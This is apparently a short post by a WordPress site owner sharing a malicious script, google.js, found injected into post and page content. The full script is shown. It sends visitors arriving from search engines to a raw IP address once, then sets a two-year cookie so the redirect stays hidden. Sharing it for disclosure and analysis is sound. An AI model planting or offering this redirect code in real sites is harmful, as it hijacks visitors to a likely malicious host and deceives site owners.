A malware that I found in my wordpress installation. Was linked from Post and Page content in DB

google.js

    var from = document.referrer;
    var i;
    var se = ["google", "yahoo", "bing", "yandex" , "baidu", "gigablast", "soso", "blekko", "exalead", "sogou", "duckduckgo", "volunia"];
    for (i = 0; i < se.length; ++i) {
        if (from.indexOf(se[i]) + 1) {
            if (!checkCookie()) {
                window.location = "http://91.239.15.61/g.php";
            }
        }
    }

    function getCookie(c_name) {
        var c_value = document.cookie;
        var c_start = c_value.indexOf(" " + c_name + "=");
        if (c_start == -1) {
            c_start = c_value.indexOf(c_name + "=");
        }
        if (c_start == -1) {
            c_value = null;
        }
        else {
            c_start = c_value.indexOf("=", c_start) + 1;
            var c_end = c_value.indexOf(";", c_start);
            if (c_end == -1) {
                c_end = c_value.length;
            }
            c_value = unescape(c_value.substring(c_start, c_end));
        }
        return c_value;
    }

    function setCookie(c_name, value, exdays) {
        var exdate = new Date();
        exdate.setDate(exdate.getDate() + exdays);
        var c_value = escape(value) + ((exdays == null) ? "" : "; expires=" + exdate.toUTCString());
        document.cookie = c_name + "=" + c_value;
    }

    function checkCookie() {
        var referrerRedirectCookie = getCookie("referrerRedirectCookie");
        if (referrerRedirectCookie != null && referrerRedirectCookie != "") {
            return true;
        }
        else {
            setCookie("referrerRedirectCookie", "do not redirect", 730);
            return false;
        }
    }